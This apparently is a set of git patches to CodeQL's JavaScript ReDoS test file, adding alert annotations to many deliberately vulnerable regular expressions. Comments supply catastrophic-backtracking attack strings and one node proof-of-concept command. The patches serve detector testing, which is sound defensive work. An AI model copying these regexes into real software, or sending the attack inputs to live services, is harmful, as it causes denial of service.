082e16b3d31f679eaf4a31ef0bf776cf76328a88 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:58:56 +0100 Subject: [PATCH 086/892] JS: More Alert comments in ReDoS/tst.js based on variable naming Again just trying to translate the original intent behind the test, without taking actual query results into account --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 48 +++++++++---------- 1 file changed, 23 insertions(+), 25 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 455db4f86e93..735d45ea6cc1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -41,24 +41,22 @@ var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; -// NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; -var bad8 = /^([a-z]*)*$/; -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; +var bad7 = /^([a-z]+)+$/; // $ Alert +var bad8 = /^([a-z]*)*$/; // $ Alert +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert -// NOT GOOD; attack: "[" + "][".repeat(100) + "]!" // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. @@ -279,11 +277,11 @@ var bad78 = /^(b+.)+$/; // $ Alert var good39 = /a*b/; -// All 4 bad combinations of nested * and + -var bad79 = /(a*)*b/; -var bad80 = /(a+)*b/; -var bad81 = /(a*)+b/; -var bad82 = /(a+)+b/; +// All 4 bad combinations of nested * and +) +var bad79 = /(a*)*b/; // $ Alert +var bad80 = /(a+)*b/; // $ Alert +var bad81 = /(a*)+b/; // $ Alert +var bad82 = /(a+)+b/; // $ Alert var good40 = /(a|b)+/; @@ -300,45 +298,45 @@ var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; -var bad89 = /(x*)+(?=$)/ -var bad90 = /(x*)+(?=$|y)/ +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert +var bad89 = /(x*)+(?=$)/ // $ Alert +var bad90 = /(x*)+(?=$|y)/ // $ Alert // OK - but we spuriously conclude that a rejecting suffix exists. var good44 = /([\s\S]*)+(?=$)/; var good45 = /([\s\S]*)+(?=$|y)/; var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; +var bad91 = /(foo|FOO)*bar/i; // $ Alert var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; +var bad92 = /([DE]|[de])*F/i; // $ Alert -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; -var bad94 = /(a|aa)*$/; +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert +var bad94 = /(a|aa)*$/; // $ Alert var bad95 = new RegExp( "(a" + "|" + "aa)*" + "b$" -); +); // $ Alert var bad96 = new RegExp("(" + "(c|cc)*|" + "(d|dd)*|" + "(e|ee)*" + -")f$"); +")f$"); // $ Alert var bad97 = new RegExp( "(g|gg" + - ")*h$"); + ")*h$"); // $ Alert -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; +var bad99 = /(a{1,})*b/; // $ Alert var unicode = /^\n\u0000(\u0000|.)+$/; From 266ac0963773318799a6ac9429de8b643ddf327e Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:29:18 +0100 Subject: [PATCH 087/892] JS: Add query iDs --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 194 +++++++++--------- 1 file changed, 97 insertions(+), 97 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 735d45ea6cc1..6be96967a643 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -1,6 +1,6 @@ // Adapted from marked (https://github.com/markedjs/marked), which is licensed // under the MIT license; see file marked-LICENSE. -var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert - attack: "_" + "__".repeat(100) +var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert[js/redos] - attack: "_" + "__".repeat(100) // Adapted from marked (https://github.com/markedjs/marked), which is licensed @@ -14,7 +14,7 @@ var good2 = /(.*,)+.+/; // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert - attack: " '" + "\\\\".repeat(100) +var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert[js/redos] - attack: " '" + "\\\\".repeat(100) // Adapted from lulucms2 (https://github.com/yiifans/lulucms2). @@ -25,117 +25,117 @@ var good2 = /\(\*(?:[\s\S]*?\(\*[\s\S]*?\*\))*[\s\S]*?\*\)/; // under the MIT license; see file jest-LICENSE. var good3 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/; -var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) +var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert[js/redos] - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) // Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), // which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert - attack: "/" + "\\/a".repeat(100) +var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert[js/redos] - attack: "/" + "\\/a".repeat(100) // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert - attack: "##".repeat(100) + "\na" +var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert[js/redos] - attack: "##".repeat(100) + "\na" var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. -var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; +var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; // $ Alert[js/redos] // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert[js/redos] - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; // $ Alert -var bad8 = /^([a-z]*)*$/; // $ Alert -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert +var bad7 = /^([a-z]+)+$/; // $ Alert[js/redos] +var bad8 = /^([a-z]*)*$/; // $ Alert[js/redos] +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert[js/redos] +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert[js/redos] // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert[js/redos] - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. -var bad12 = /("|')(\\?.)*?\1/g; // $ Alert - attack: "'" + "\\a".repeat(100) + '"' +var bad12 = /("|')(\\?.)*?\1/g; // $ Alert[js/redos] - attack: "'" + "\\a".repeat(100) + '"' -var bad13 = /(b|a?b)*c/; // $ Alert +var bad13 = /(b|a?b)*c/; // $ Alert[js/redos] -var bad15 = /(a|aa?)*b/; // $ Alert +var bad15 = /(a|aa?)*b/; // $ Alert[js/redos] var good7 = /(.|\n)*!/; -var bad16 = /(.|\n)*!/s; // $ Alert - attack: "\n".repeat(100) + "." +var bad16 = /(.|\n)*!/s; // $ Alert[js/redos] - attack: "\n".repeat(100) + "." var good8 = /([\w.]+)*/; -var bad17 = new RegExp('(a|aa?)*b'); // $ Alert +var bad17 = new RegExp('(a|aa?)*b'); // $ Alert[js/redos] // OK - not used as regexp var good9 = '(a|aa?)*b'; -var bad18 = /(([^]|[^a])*)"/; // $ Alert +var bad18 = /(([^]|[^a])*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good10 = /([^"']+)*/g; -var bad20 = /((.|[^a])*)"/; // $ Alert +var bad20 = /((.|[^a])*)"/; // $ Alert[js/redos] var good10 = /((a|[^a])*)"/; -var bad21 = /((b|[^a])*)"/; // $ Alert +var bad21 = /((b|[^a])*)"/; // $ Alert[js/redos] -var bad22 = /((G|[^a])*)"/; // $ Alert +var bad22 = /((G|[^a])*)"/; // $ Alert[js/redos] -var bad23 = /(([0-9]|[^a])*)"/; // $ Alert +var bad23 = /(([0-9]|[^a])*)"/; // $ Alert[js/redos] -var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert +var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert[js/redos] -var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert +var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert[js/redos] var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 -var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert +var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert[js/redos] -var bad27 = /(([^a-z]|[^0-9])*)"/; // $ Alert +var bad27 = /(([^a-z]|[^0-9])*)"/; // $ Alert[js/redos] -var bad28 = /((\d|[0-9])*)"/; // $ Alert +var bad28 = /((\d|[0-9])*)"/; // $ Alert[js/redos] -var bad29 = /((\s|\s)*)"/; // $ Alert +var bad29 = /((\s|\s)*)"/; // $ Alert[js/redos] -var bad30 = /((\w|G)*)"/; // $ Alert +var bad30 = /((\w|G)*)"/; // $ Alert[js/redos] var good11 = /((\s|\d)*)"/; -var bad31 = /((\d|\w)*)"/; // $ Alert +var bad31 = /((\d|\w)*)"/; // $ Alert[js/redos] -var bad32 = /((\d|5)*)"/; // $ Alert +var bad32 = /((\d|5)*)"/; // $ Alert[js/redos] -var bad33 = /((\s|[\f])*)"/; // $ Alert +var bad33 = /((\s|[\f])*)"/; // $ Alert[js/redos] -var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert +var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert[js/redos] -var bad35 = /((\f|[\f])*)"/; // $ Alert +var bad35 = /((\f|[\f])*)"/; // $ Alert[js/redos] -var bad36 = /((\W|\D)*)"/; // $ Alert +var bad36 = /((\W|\D)*)"/; // $ Alert[js/redos] -var bad37 = /((\S|\w)*)"/; // $ Alert +var bad37 = /((\S|\w)*)"/; // $ Alert[js/redos] -var bad38 = /((\S|[\w])*)"/; // $ Alert +var bad38 = /((\S|[\w])*)"/; // $ Alert[js/redos] -var bad39 = /((1s|[\da-z])*)"/; // $ Alert +var bad39 = /((1s|[\da-z])*)"/; // $ Alert[js/redos] -var bad40 = /((0|[\d])*)"/; // $ Alert +var bad40 = /((0|[\d])*)"/; // $ Alert[js/redos] -var bad41 = /(([\d]+)*)"/; // $ Alert +var bad41 = /(([\d]+)*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good12 = /(\d+(X\d+)?)+/; @@ -146,38 +146,38 @@ var good13 = /([0-9]+(X[0-9]*)?)*/; var good15 = /^([^>]+)*(>|$)/; -var bad43 = /^([^>a]+)*(>|$)/; // $ Alert +var bad43 = /^([^>a]+)*(>|$)/; // $ Alert[js/redos] -var bad44 = /(\n\s*)+$/; // $ Alert +var bad44 = /(\n\s*)+$/; // $ Alert[js/redos] -var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert +var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert[js/redos] -var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert +var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert[js/redos] -var bad47 = /(a+|b+|c+)*c/; // $ Alert +var bad47 = /(a+|b+|c+)*c/; // $ Alert[js/redos] -var bad48 = /(((a+a?)*)+b+)/; // $ Alert +var bad48 = /(((a+a?)*)+b+)/; // $ Alert[js/redos] -var bad49 = /(a+)+bbbb/; // $ Alert +var bad49 = /(a+)+bbbb/; // $ Alert[js/redos] var good16 = /(a+)+aaaaa*a+/; -var bad50 = /(a+)+aaaaa$/; // $ Alert +var bad50 = /(a+)+aaaaa$/; // $ Alert[js/redos] var good17 = /(\n+)+\n\n/; -var bad51 = /(\n+)+\n\n$/; // $ Alert +var bad51 = /(\n+)+\n\n$/; // $ Alert[js/redos] -var bad52 = /([^X]+)*$/; // $ Alert +var bad52 = /([^X]+)*$/; // $ Alert[js/redos] -var bad53 = /(([^X]b)+)*$/; // $ Alert +var bad53 = /(([^X]b)+)*$/; // $ Alert[js/redos] var good18 = /(([^X]b)+)*($|[^X]b)/; -var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert +var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert[js/redos] var good20 = /((ab)+)*ababab/; @@ -188,12 +188,12 @@ var good21 = /((ab)+)*abab(ab)*(ab)+/; var good22 = /((ab)+)*/; -var bad55 = /((ab)+)*$/; // $ Alert +var bad55 = /((ab)+)*$/; // $ Alert[js/redos] var good23 = /((ab)+)*[a1][b1][a2][b2][a3][b3]/; -var bad56 = /([\n\s]+)*(.)/; // $ Alert +var bad56 = /([\n\s]+)*(.)/; // $ Alert[js/redos] // OK - any witness passes through the accept state. var good24 = /(A*A*X)*/; @@ -201,11 +201,11 @@ var good24 = /(A*A*X)*/; var good26 = /([^\\\]]+)*/ -var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert +var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert[js/redos] -var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert +var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert[js/redos] -var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert +var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert[js/redos] var good27 = /(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-/ @@ -218,102 +218,102 @@ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix -var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert - and a good prefix test +var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test var good30 = /(a+)*[^][^][^]?/; // GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[^]{2,3}`). -var good31 = /(a+)*[^]{2,3}/; +var good31 = /(a+)*[^]{2,3}/; // $ Alert[js/redos] // GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[^]{2,}` when constructing the NFA). -var good32 = /(a+)*([^]{2,}|X)$/; +var good32 = /(a+)*([^]{2,}|X)$/; // $ Alert[js/redos] var good33 = /(a+)*([^]*|X)$/; -var bad64 = /((a+)*$|[^]+)/; // $ Alert +var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; -var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert - a good prefix test +var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert[js/redos] - a good prefix test -var bad66 = /^ab(c+)+$/; // $ Alert +var bad66 = /^ab(c+)+$/; // $ Alert[js/redos] -var bad67 = /(\d(\s+)*){20}/; // $ Alert +var bad67 = /(\d(\s+)*){20}/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good36 = /(([^/]|X)+)(\/[^]*)*$/; +var good36 = /(([^/]|X)+)(\/[^]*)*$/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good37 = /^((x([^Y]+)?)*(Y|$))/; +var good37 = /^((x([^Y]+)?)*(Y|$))/; // $ Alert[js/redos] -var bad68 = /(a*)+b/; // $ Alert +var bad68 = /(a*)+b/; // $ Alert[js/redos] -var bad69 = /foo([\w-]*)+bar/; // $ Alert +var bad69 = /foo([\w-]*)+bar/; // $ Alert[js/redos] -var bad70 = /((ab)*)+c/; // $ Alert +var bad70 = /((ab)*)+c/; // $ Alert[js/redos] -var bad71 = /(a?a?)*b/; // $ Alert +var bad71 = /(a?a?)*b/; // $ Alert[js/redos] var good38 = /(a?)*b/; var bad72 = /(c?a?)*b/; // $ MISSING: Alert -var bad73 = /(?:a|a?)+b/; // $ Alert +var bad73 = /(?:a|a?)+b/; // $ Alert[js/redos] var bad74 = /(a?b?)*$/; // $ MISSING: Alert -var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert +var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert[js/redos] -var bad77 = /^((a)+\w)+$/; // $ MISSING: Alert +var bad77 = /^((a)+\w)+$/; // $ Alert[js/redos] -var bad78 = /^(b+.)+$/; // $ Alert +var bad78 = /^(b+.)+$/; // $ Alert[js/redos] var good39 = /a*b/; // All 4 bad combinations of nested * and +) -var bad79 = /(a*)*b/; // $ Alert -var bad80 = /(a+)*b/; // $ Alert -var bad81 = /(a*)+b/; // $ Alert -var bad82 = /(a+)+b/; // $ Alert +var bad79 = /(a*)*b/; // $ Alert[js/redos] +var bad80 = /(a+)*b/; // $ Alert[js/redos] +var bad81 = /(a*)+b/; // $ Alert[js/redos] +var bad82 = /(a+)+b/; // $ Alert[js/redos] var good40 = /(a|b)+/; var good41 = /(?:[\s;,"'<>(){}|[\]@=+*]|:(?![/\\]))+/; -var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert -var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert -var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert -var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert +var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert[js/redos] +var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert[js/redos] +var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert[js/redos] +var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert[js/redos] var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; -var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert -var bad89 = /(x*)+(?=$)/ // $ Alert -var bad90 = /(x*)+(?=$|y)/ // $ Alert +var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert[js/redos] +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert[js/redos] +var bad89 = /(x*)+(?=$)/ // $ Alert[js/redos] +var bad90 = /(x*)+(?=$|y)/ // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good44 = /([\s\S]*)+(?=$)/; -var good45 = /([\s\S]*)+(?=$|y)/; +var good44 = /([\s\S]*)+(?=$)/; // $ Alert[js/redos] +var good45 = /([\s\S]*)+(?=$|y)/; // $ Alert[js/redos] var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; // $ Alert +var bad91 = /(foo|FOO)*bar/i; // $ Alert[js/redos] var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; // $ Alert +var bad92 = /([DE]|[de])*F/i; // $ Alert[js/redos] -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert -var bad94 = /(a|aa)*$/; // $ Alert +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert[js/redos] +var bad94 = /(a|aa)*$/; // $ Alert[js/redos] var bad95 = new RegExp( "(a" + @@ -330,16 +330,16 @@ var bad96 = new RegExp("(" + var bad97 = new RegExp( "(g|gg" + - ")*h$"); // $ Alert + ")*h$"); // $ Alert[js/redos] -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert[js/redos] var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; // $ Alert +var bad99 = /(a{1,})*b/; // $ Alert[js/redos] -var unicode = /^\n\u0000(\u0000|.)+$/; +var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] -var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); +var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] var unicodeSets = /(aa?)*b/v; From 1fcebcec8716a213439b810f5d268556e79b97e8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:29:35 +0100 Subject: [PATCH 088/892] JS: Move some ReDoS alerts --- .../ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 6be96967a643..c2f83ed25aee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -319,14 +319,14 @@ var bad95 = new RegExp( "(a" + "|" + "aa)*" + - "b$" -); // $ Alert + "b$" // $ Alert[js/redos] +); var bad96 = new RegExp("(" + - "(c|cc)*|" + - "(d|dd)*|" + + "(c|cc)*|" + // $ Alert[js/redos] + "(d|dd)*|" + // $ Alert[js/redos] "(e|ee)*" + -")f$"); // $ Alert +")f$"); // $ Alert[js/redos] var bad97 = new RegExp( "(g|gg" + From a0f8e287907732be0383d21ca86178b3d904273f Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:30:15 +0100 Subject: [PATCH 089/892] JS: Accept a fixed FN --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 